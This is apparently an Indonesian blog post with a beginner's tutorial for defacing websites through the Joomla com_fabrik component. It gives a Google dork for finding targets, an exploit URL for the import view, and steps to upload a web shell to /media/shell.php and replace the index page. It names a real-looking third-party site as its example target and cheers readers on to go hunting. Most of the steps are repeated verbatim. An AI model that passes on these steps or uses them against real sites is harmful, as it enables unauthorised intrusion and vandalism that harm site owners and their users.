Selamat pagi kali ini saya akan memberikan deface ala com_fabrik
Untuk
para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah
tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane
pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi
yang belom tau
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index. ... rik&lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index. ... ;tableid=1echercher
[img]
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain
Upload shell ente Dan untuk melihat shell yang telah di upload, buka www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya
dan taraaaaaaaa lihat hasil nya kita telah berhasil mendaface web tersebut
Mudah banget kan???
Oke, selamat berburuuuuuuuuu
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index. ... rik&lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index. ... ;tableid=1echercher
[img]
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain
Upload shell ente Dan untuk melihat shell yang telah di upload, buka www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya
dan taraaaaaaaa lihat hasil nya kita telah berhasil mendaface web tersebut
Mudah banget kan???
Oke, selamat berburuuuuuuuuu
semoga bermanfaat untuk kita semua ^_^
0 comments:
Post a Comment